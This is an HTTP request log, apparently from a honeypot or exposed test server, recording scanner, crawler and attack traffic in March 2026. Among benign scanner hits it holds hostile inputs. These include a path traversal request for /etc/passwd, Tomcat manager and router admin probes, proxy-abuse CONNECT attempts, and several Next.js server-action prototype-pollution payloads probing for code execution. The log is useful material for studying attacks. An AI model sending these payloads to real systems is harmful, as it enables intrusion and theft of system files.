User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:48280
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-09 23:27:40] === HTTP Request ===
[2026-03-09 23:08:04] Main page accessed - IP: 205.210.31.227:60564
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 205.210.31.227:60564
Path: /
URL: /
Method: GET
[2026-03-09 23:08:04] === HTTP Request ===
[2026-03-09 22:25:47] Main page accessed - IP: 178.83.200.2:60000
===================
Accept: */*
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 178.83.200.2:60000
Path: /
URL: /
Method: GET
[2026-03-09 22:25:47] === HTTP Request ===
[2026-03-09 22:03:57] Main page accessed - IP: 147.185.132.192:64576
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.192:64576
Path: /
URL: /
Method: GET
[2026-03-09 22:03:57] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.122:9164
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-09 21:56:12] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 162.142.125.122:9158
Path: *
URL: *
Method: PRI
[2026-03-09 21:56:12] === HTTP Request ===
[2026-03-09 21:56:11] Main page accessed - IP: 162.142.125.122:9156
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.122:9156
Path: /
URL: /
Method: GET
[2026-03-09 21:56:11] === HTTP Request ===
===================
Accept-Encoding: gzip
Connection: close
User-Agent: Baiduspider ( http://www.baidu.com/search/spider.htm)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 186.236.240.56:59546
Path: /tomcat/html
URL: /tomcat/html
Method: GET
[2026-03-09 21:42:00] === HTTP Request ===
===================
Accept-Encoding: gzip
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 186.236.240.56:59530
Path: /html
URL: /html
Method: GET
[2026-03-09 21:41:59] === HTTP Request ===
===================
Accept-Encoding: gzip
Connection: close
User-Agent: SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 186.236.240.56:59524
Path: /manager/text
URL: /manager/text
Method: GET
[2026-03-09 21:41:59] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept-Encoding: gzip
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 186.236.240.56:60230
Path: /manager/html
URL: /manager/html
Method: GET
[2026-03-09 21:41:58] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxyjudge.us
RemoteAddr: 89.190.156.94:47504
Path: /azenv.php
URL: http://proxyjudge.us/azenv.php
Method: GET
[2026-03-09 21:38:05] === HTTP Request ===
[2026-03-09 21:38:05] Main page accessed - IP: 89.190.156.94:47492
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: azenv.net
RemoteAddr: 89.190.156.94:47492
Path: /
URL: http://azenv.net/
Method: GET
[2026-03-09 21:38:05] === HTTP Request ===
[2026-03-09 20:40:08] Main page accessed - IP: 198.235.24.114:58934
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 198.235.24.114:58934
Path: /
URL: /
Method: GET
[2026-03-09 20:40:08] === HTTP Request ===
[2026-03-09 20:11:03] Main page accessed - IP: 185.247.137.90:47299
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru:8081
RemoteAddr: 185.247.137.90:47299
Path: /
URL: /
Method: GET
[2026-03-09 20:11:03] === HTTP Request ===
[2026-03-09 20:02:32] Main page accessed - IP: 172.30.0.12:40876
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40876
Path: /
URL: /
Method: HEAD
[2026-03-09 20:02:32] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.121.84.57:44694
Path: /cgi-bin/luci/;stok=/locale
URL: /cgi-bin/luci/;stok=/locale
Method: GET
[2026-03-09 18:36:25] === HTTP Request ===
[2026-03-09 15:38:16] Main page accessed - IP: 87.236.176.171:44705
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.171:44705
Path: /
URL: /
Method: GET
[2026-03-09 15:38:16] === HTTP Request ===
===================
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru/_next
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42238
Path: /_next
URL: /_next
Method: HEAD
[2026-03-09 14:10:00] === HTTP Request ===
[2026-03-09 14:09:59] Main page accessed - IP: 172.30.0.12:42238
===================
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru
Range: bytes=0-2048
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-For: 176.65.148.161
X-Forwarded-Host: admin.vulnberries.ru
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42238
Path: /
URL: /
Method: GET
[2026-03-09 14:09:59] === HTTP Request ===
[2026-03-09 14:09:57] Main page accessed - IP: 172.30.0.12:42238
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42238
Path: /
URL: /
Method: HEAD
[2026-03-09 14:09:57] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:37890
Path: /jars
URL: /jars
Method: GET
[2026-03-09 13:44:26] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru/_next
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:32994
Path: /_next
URL: /_next
Method: HEAD
[2026-03-09 13:38:59] === HTTP Request ===
[2026-03-09 13:38:57] Main page accessed - IP: 172.30.0.12:32994
===================
X-Forwarded-Proto: https
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Range: bytes=0-2048
X-Forwarded-Host: admin.vulnberries.ru
Referer: http://admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:32994
Path: /
URL: /
Method: GET
[2026-03-09 13:38:57] === HTTP Request ===
[2026-03-09 13:38:56] Main page accessed - IP: 172.30.0.12:32994
===================
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:32994
Path: /
URL: /
Method: HEAD
[2026-03-09 13:38:56] === HTTP Request ===
[2026-03-09 13:38:38] Main page accessed - IP: 172.30.0.12:32994
===================
Referer: http://admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:32994
Path: /
URL: /
Method: HEAD
[2026-03-09 13:38:38] === HTTP Request ===
[2026-03-09 12:47:05] Main page accessed - IP: 34.52.219.24:34702
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.52.219.24:34702
Path: /
URL: /
Method: GET
[2026-03-09 12:47:05] === HTTP Request ===
[2026-03-09 12:47:03] Main page accessed - IP: 34.53.162.177:52972
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.53.162.177:52972
Path: /
URL: /
Method: GET
[2026-03-09 12:47:03] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.185
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41272
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-09 12:42:46] === HTTP Request ===
[2026-03-09 11:46:55] Main page accessed - IP: 64.23.161.101:34348
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.23.161.101:34348
Path: /
URL: /
Method: GET
[2026-03-09 11:46:55] === HTTP Request ===
[2026-03-09 11:44:00] Main page accessed - IP: 129.212.234.237:33778
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 129.212.234.237:33778
Path: /
URL: /
Method: GET
[2026-03-09 11:44:00] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:44796
Path: /config.json
URL: /config.json
Method: GET
[2026-03-09 11:20:05] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:44790
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-09 11:20:04] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:44776
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-09 11:20:04] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:44772
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-09 11:20:04] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:44764
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-09 11:20:04] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:44754
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-09 11:20:03] === HTTP Request ===
[2026-03-09 11:19:45] Main page accessed - IP: 165.154.12.139:51600
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.154.12.139:51600
Path: /
URL: /
Method: GET
[2026-03-09 11:19:45] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 65.49.1.220:44163
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-09 10:14:49] === HTTP Request ===
[2026-03-09 10:14:39] Main page accessed - IP: 65.49.1.213:33015
===================
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 65.49.1.213:33015
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-09 10:14:39] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:143.0) Gecko/20100101 Firefox/143.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.220:52367
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-09 10:13:51] === HTTP Request ===
[2026-03-09 10:13:10] Main page accessed - IP: 65.49.1.212:31744
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.212:31744
Path: /
URL: /
Method: GET
[2026-03-09 10:13:10] === HTTP Request ===
[2026-03-09 09:23:29] Main page accessed - IP: 34.38.83.65:58450
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.38.83.65:58450
Path: /
URL: /
Method: GET
[2026-03-09 09:23:29] === HTTP Request ===
[2026-03-09 09:21:00] Main page accessed - IP: 165.245.191.110:51752
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.245.191.110:51752
Path: /
URL: /
Method: GET
[2026-03-09 09:21:00] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:41508
Path: /jars
URL: /jars
Method: GET
[2026-03-09 06:20:07] === HTTP Request ===
[2026-03-09 04:21:58] Main page accessed - IP: 172.30.0.12:54400
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-For: 74.7.227.20
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54400
Path: /
URL: /
Method: GET
[2026-03-09 04:21:58] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.185
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54400
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-09 04:21:55] === HTTP Request ===
[2026-03-09 04:15:09] Main page accessed - IP: 205.210.31.181:64436
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.181:64436
Path: /
URL: /
Method: GET
[2026-03-09 04:15:09] === HTTP Request ===
[2026-03-09 01:21:46] Main page accessed - IP: 121.41.167.7:53820
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.41.167.7:53820
Path: /
URL: /
Method: GET
[2026-03-09 01:21:46] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 64.89.160.111:53820
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-09 00:19:52] === HTTP Request ===
===================
------WebKitFormBoundaryx656291218451--
------WebKitFormBoundaryx656291218451
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx656291218451
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 93023+true+7055150;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx656291218451
X-Nextjs-Html-Request-Id: ilovepoop_656291218451
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx656291218451
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34894
Path: /api/route
URL: /api/route
Method: POST
[2026-03-09 00:14:19] === HTTP Request ===
===================
------WebKitFormBoundaryx846138701137--
------WebKitFormBoundaryx846138701137
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx846138701137
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 273352+true+3095418;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx846138701137
X-Nextjs-Html-Request-Id: ilovepoop_846138701137
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx846138701137
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34892
Path: /app
URL: /app
Method: POST
[2026-03-09 00:14:18] === HTTP Request ===
===================
------WebKitFormBoundaryx134521349271--
------WebKitFormBoundaryx134521349271
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx134521349271
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 289730+true+464299;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx134521349271
X-Nextjs-Html-Request-Id: ilovepoop_134521349271
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx134521349271
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34882
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-09 00:14:18] === HTTP Request ===
===================
------WebKitFormBoundaryx823098792262--
------WebKitFormBoundaryx823098792262
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx823098792262
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 193261+true+4259001;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx823098792262
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx823098792262
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_823098792262
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34878
Path: /api
URL: /api
Method: POST
[2026-03-09 00:14:18] === HTTP Request ===
===================
------WebKitFormBoundaryx1109332744183--
------WebKitFormBoundaryx1109332744183
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1109332744183
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 302814+true+3663413;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1109332744183
X-Nextjs-Html-Request-Id: ilovepoop_1109332744183
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1109332744183
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34870
Path: /_next
URL: /_next
Method: POST
[2026-03-09 00:14:17] === HTTP Request ===
[2026-03-09 00:14:16] Main page accessed - IP: 195.3.221.86:49424
===================
------WebKitFormBoundaryx864218883871--
------WebKitFormBoundaryx864218883871
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx864218883871
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 157506+true+5486895;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx864218883871
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx864218883871
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_864218883871
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49424
Path: /
URL: /
Method: POST
[2026-03-09 00:14:16] === HTTP Request ===
[2026-03-09 00:14:12] Main page accessed - IP: 195.3.221.86:49414
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49414
Path: /
URL: /
Method: GET
[2026-03-09 00:14:12] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.12:33044
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-08 21:27:19] === HTTP Request ===
[2026-03-08 21:27:19] Main page accessed - IP: 85.142.100.12:33036
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Accept-Encoding: gzip
Accept: */*
Headers:
